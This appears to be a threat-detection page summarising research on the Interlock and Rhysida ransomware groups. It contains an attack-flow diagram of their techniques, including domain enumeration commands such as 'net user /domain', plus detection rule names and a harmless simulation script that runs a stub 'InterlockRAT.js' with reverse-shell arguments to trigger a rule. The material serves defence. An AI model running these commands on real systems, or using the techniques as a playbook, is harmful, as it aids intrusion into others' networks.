Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
IBM X-Force research highlights a strong connection between the Interlock (Hive0163) and Rhysida ransomware ecosystems. The report outlines an intricate network of shared malware families, specialized crypters, and coordinated initial access brokers. Interlock appears to be a highly mature threat group using custom tooling such as NodeSnake and InterlockRAT, and it may have evolved from operators previously associated with Rhysida.
Investigation
X-Force carried out long-term research over more than two years, analyzing malware samples, attack chains, and staging infrastructure. The investigation uncovered substantial code similarities across multiple backdoors and tracked the development of dedicated crypters such as JunkFiction and Tomb. Researchers also mapped ties between threat actors and initial access brokers through overlapping infrastructure and tool usage.
Mitigation
Organizations should deploy strong endpoint detection and response capabilities to identify suspicious process behavior, including unexpected PowerShell activity and unauthorized registry changes. Prompt patching of internet-facing network devices is essential to reduce the risk of exploitation, including vulnerabilities such as CVE-2026-20131. Enforcing strict WDAC controls and monitoring for unapproved RMM tool activity can also limit post-compromise operations.
Response
If Interlock or Rhysida activity is suspected, isolate impacted systems immediately to stop lateral movement through RDP or SOCKS5 tunnels. Conduct a thorough review of staging infrastructure and check for unauthorized remote management tools such as ConnectWise ScreenConnect. Review logs for suspicious PowerShell execution and investigate any unauthorized changes involving scheduled tasks or systemd services.
"graph TB %% Class Definitions classDef initial_access fill:#f96,stroke:#333,stroke-width:2px classDef evasion fill:#bbf,stroke:#333,stroke-width:2px classDef execution fill:#dfd,stroke:#333,stroke-width:2px classDef persistence fill:#fdd,stroke:#333,stroke-width:2px classDef command_control fill:#ffd,stroke:#333,stroke-width:2px classDef discovery fill:#dff,stroke:#333,stroke-width:2px classDef lateral_movement fill:#dcd,stroke:#333,stroke-width:2px classDef impact fill:#f99,stroke:#333,stroke-width:2px classDef tool_malware fill:#eee,stroke:#333,stroke-width:1px %% Initial Access Phase action_drive_by["<b>Action</b> – <b idea='T1189 Drive-by Compromise</b><br/>Victims lured via fraudulent websites,<br/>malicious ads, or search engine redirects."] class action_drive_by initial_access action_content_injection["<b>Action</b> – <b idea='T1204 Content Injection</b><br/>Use of Traffic Distribution Systems (TDS)<br/>like TAG-124 or ClickFix to redirect users."] class action_content_injection initial_access action_subvert_trust["<b>Action</b> – <b idea='T1553 Subvert Trust Controls: Code Signing</b><br/>Using fraudulent certificates like<br/>Foshan Yongqiheng Trading Co., Ltd."] class action_subvert_trust evasion %% Execution and Transfer Phase action_user_exec["<b>Action</b> – <b idea='T1204 User Execution</b><br/>Execution of trojanized installers<br/>(e.g., Microsoft Teams, Chrome, or Edge)."] class action_user_exec execution malware_initial_payload["<b>Malware</b> – <b idea='Payloads'>JunkFiction, NodeSnake, or Endico</b><br/>Initial stage downloaders executed<br/>via user interaction."] class malware_initial_payload tool_malware action_ingress_transfer["<b>Action</b> – <b idea='T1105 Ingress Tool Transfer</b><br/>Retrieving second-stage malware from<br/>remote Command and Control servers."] class action_ingress_transfer execution malware_second_stage["<b>Malware</b> – <b idea='Backdoors'>Supper or InterlockRAT</b><br/>Second-stage backdoors retrieved<br/>to facilitate remote access."] class malware_second_stage tool_malware %% Persistence Phase action_persistence_linux["<b>Action</b> – <b idea='T1543.003 Boot or Logon Initialization Scripts: Systemd Service</b><br/>Linux NodeSnake variants creating<br/>new systemd services."] class action_persistence_linux persistence action_persistence_windows["<b>Action</b> – <b idea='T1547 Unix Shell Configuration Modification'>Windows Persistence</b><br/>Utilizing shell configuration modifications<br/>to maintain a foothold."] class action_persistence_windows persistence %% Command and Control Phase action_c2["<b>Action</b> – <b idea='T1219 Remote Access Software</b><br/>Establishing reverse shells and<br/>SOCKS5 tunnels for stealthy communication."] class action_c2 command_control %% Discovery Phase action_discovery_domain["<b>Action</b> – <b idea='T1087.002 Account Discovery: Domain Account</b><br/>Enumerating domain accounts using<br/>commands like net user /domain."] class action_discovery_domain discovery action_discovery_groups["<b>Action</b> – <b idea='T1069.002 Permission Groups Discovery: Domain Groups</b><br/>Enumerating groups using<br/>net group domain admins /domain."] class action_discovery_groups discovery %% Lateral Movement and Impact Phase action_lateral_move["<b>Action</b> – <b idea='T1210 Exploitation of Remote Services</b><br/>Moving through environment via RDP<br/>sessions initiated through reverse shells."] class action_lateral_move lateral_movement action_selective_exclusion["<b>Action</b> – <b idea='Defense Evasion'>Selective Exclusion</b><br/>Deploying custom WDAC policies to deny<br/>Microsoft Defender or Sophos EDR."] class action_selective_exclusion evasion action_impact_encryption["<b>Action</b> – <b idea='T1486 Data Encrypted for Impact</b><br/>Final deployment of Interlock or Rhysida<br/>ransomware to encrypt victim files."] class action_impact_encryption impact %% Connections action_drive_by –>|facilitates| action_content_injection action_content_injection –>|leads_to| action_user_exec action_user_exec –>|uses| malware_initial_payload malware_initial_payload –>|requires| action_subvert_trust malware_initial_payload –>|triggers| action_ingress_transfer action_ingress_transfer –>|downloads| malware_second_stage malware_second_stage –>|establishes| action_persistence_linux malware_second_stage –>|establishes| action_persistence_windows malware_second_stage –>|enables| action_c2 action_c2 –>|performs| action_discovery_domain action_c2 –>|performs| action_discovery_groups action_discovery_domain –>|informs| action_lateral_move action_discovery_groups –>|informs| action_lateral_move action_lateral_move –>|leads_to| action_selective_exclusion action_selective_exclusion –>|precedes| action_impact_encryption "
Attack Flow
Detections
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
View
Download or Upload via Powershell (via cmdline)
View
Possible System Enumeration (via cmdline)
View
Possible Remote System Discovery or Connectivity Check (via cmdline)
View
Possible Admin Account or Group Enumeration (via cmdline)
View
Suspicious Domain Trusts Discovery (via cmdline)
View
Possible Evasion Checks (via powershell)
View
Suspicious Binary / Scripts in Autostart Location (via file_event)
View
Possible Telegram Abuse As Command And Control Channel (via dns_query)
View
Steam Communtiy DNS Request Perfomed By Suspicious Process (via dns_query)
View
IOCs (HashSha256) to detect: Security Artificial Intelligence: Interlock and Rhysida within the Ransomware Ecosystem Part 3
View
IOCs (HashSha256) to detect: Security Artificial Intelligence: Interlock and Rhysida within the Ransomware Ecosystem Part 2
View
IOCs (HashSha256) to detect: Security Artificial Intelligence: Interlock and Rhysida within the Ransomware Ecosystem Part 1
View
IOCs (SourceIP) to detect: Security Artificial Intelligence: Interlock and Rhysida within the Ransomware Ecosystem
View
IOCs (DestinationIP) to detect: Security Artificial Intelligence: Interlock and Rhysida within the Ransomware Ecosystem
View
JunkFiction Downloader and Scheduled PowerShell Script Detection [Windows Powershell]
View
Detection of Supper Backdoor and JunkFiction Downloader [Windows Process Creation]
View
Detection of NodeSnake and InterlockRAT Activity [Linux Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands: The adversary has successfully compromised a developer’s workstation via a supply chain attack (T1195.003). They have dropped a malicious Node.js payload named
InterlockRAT.jsinto a temporary directory. The goal is to establish a persistent backdoor to facilitate lateral movement within the network. The attacker executes the script using thenoderuntime, passing specific arguments to initialize a SOCKS5 proxy for tunneling traffic. This specific command is designed to trigger the existing detection logic. -
Regression Test Script:
# Create a dummy directory for the malware mkdir -p /tmp/malware_drop # Create the 'malicious' InterlockRAT.js file cat <<EOF > /tmp/malware_drop/InterlockRAT.js // Simulated malware logic console.log("Initializing InterlockRAT payload..."); EOF # Execute the file with the specific strings required to trigger the rule node /tmp/malware_drop/InterlockRAT.js --mode SOCKS5 --target reverse shell 10.0.0.5 -
Cleanup Commands:
# Remove the simulated malware files and directories rm -rf /tmp/malware_drop